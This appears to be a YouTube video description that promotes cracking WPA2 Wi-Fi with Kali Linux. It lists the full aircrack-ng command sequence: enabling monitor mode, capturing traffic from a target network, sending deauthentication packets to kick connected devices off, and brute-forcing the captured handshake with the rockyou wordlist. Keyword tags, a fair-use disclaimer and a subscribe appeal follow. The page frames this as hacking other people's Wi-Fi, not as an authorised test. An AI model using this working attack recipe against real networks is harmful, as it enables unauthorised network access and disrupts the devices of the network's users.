Hack WIFI using Kali Linux 100% working | Practical Demo | #makeeasy
#NetworkHacking #wifihacking
This video shows how to hack wifi (wpa2) and try bruteforce attack and even secure wifi.
Monitoring Mode TP-Link USB Adaptor : https://youtu.be/hijn9QMAY_w
Commands:
sudo su
cd /home/kali/Desktop/
iwconfig
airmon-ng check kill
airmon-ng start wlan0
iwconfig
airodump-ng wlan0
airodump-ng –bssid « mac of wifi » –channel 9 –write hack wlan0
Open New Terminal:
aireplay-ng –deauth 25 -a « mac of wifi » -e « mac of connected device » wlan0
cd /home/kali/Desktop/
if rockyou.txt file is in zipped format:
gzip -d rockyou.txt.gz
aircrack-ng hack-01.cap -w /usr/share/wordlists/rockyou.txt
Dark | Deep | Surface Web : https://youtu.be/WsOCcvTQiw8
WiFi hacking,
Network security,
Wireless penetration testing,
Cracking WiFi password,
WiFi security vulnerabilities,
Ethical hacking,
Man-in-the-middle attack,
WiFi sniffing,
Wireless network auditing,
Password cracking,
WiFi encryption protocols,
Brute-force attack,
Packet sniffing,
WPA/WPA2 security,
WiFi cracking tools,
WiFi hotspot security,
Wireless network reconnaissance,
Rogue access points,
Wireless network intrusion detection,
WiFi cracking tutorials,
► Disclaimer:- [Copyright Disclaimer Under Section 107 of the Copyright Act 1976, allowance is made for « fair use » for purposes such as criticism, comment, news reporting, teaching, scholarship, and research. Fair use is a use permitted by copyright statute that might otherwise be infringing. Non-profit, educational or personal use tips the balance in favor of fair use]
Channel Description :
Make Easy
This channel is created to make any concept easier.
#koolsantosh #makeeasy
IF This video is helpful then
…………………………………………………………
Like Subscribe Comment & Share
…………………………………………………………
Views : 165290
linux